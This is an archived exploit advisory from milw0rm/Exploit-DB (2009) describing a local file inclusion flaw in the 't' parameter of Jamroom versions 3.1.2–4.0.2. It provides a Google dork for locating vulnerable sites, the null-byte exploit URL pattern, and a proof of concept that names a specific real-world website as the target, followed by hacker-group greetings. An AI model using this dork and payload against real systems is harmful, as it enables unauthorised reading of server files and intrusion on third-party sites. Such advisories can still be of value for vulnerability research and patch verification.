Jamroom 4.0.2 - 't' Local File Inclusion

EDB-ID:

8423


Author:

zxvf

Type:

webapps


Platform:

PHP

Date:

2009-04-14


[o]-----------------------------------------------------------------------------------------------------------------[x]
 |  Local File Include Vulnerability                                                    |
[o]------------------------------------------------------------------------------------[o]
 |  Software : Jamroom version 3.1.2 , 3.2.3 , 3.2.4 , 3.2.5 , 3.2.6 , 4.0.2            |
 |  Vendor   : www.jamroom.net                                                          |
 |  Date     : 12 March 2009                                                            |
 |  Author   : zxvf                                                                     |
 |  Contact  : yuvant2blue@yahoo.co.id                                                   |
[o]------------------------------------------------------------------------------------[o]

[»] Google Dork

    "Powered by Jamroom"

[»] Exploit

    http://[site]/index.php?t=[LFI]%00

[»] Proof of Concept

    http://www.earplugradio.com//index.php?t=[LFI]%00

[o]------------------------------------------------------------------------------------[x]
 |  Greetz                                                                              |
[o]------------------------------------------------------------------------------------[o]
 |  c0li, OoN_Boy, pizzyroot, H312Y, eminem, xx_user, NoGe                              |
 |  Armageddon Team, avatar team, and all indonesian hacker!                            |
 |  BeHave oR BeGone !!!                                                                |
[o]------------------------------------------------------------------------------------[o]

# milw0rm.com [2009-04-14]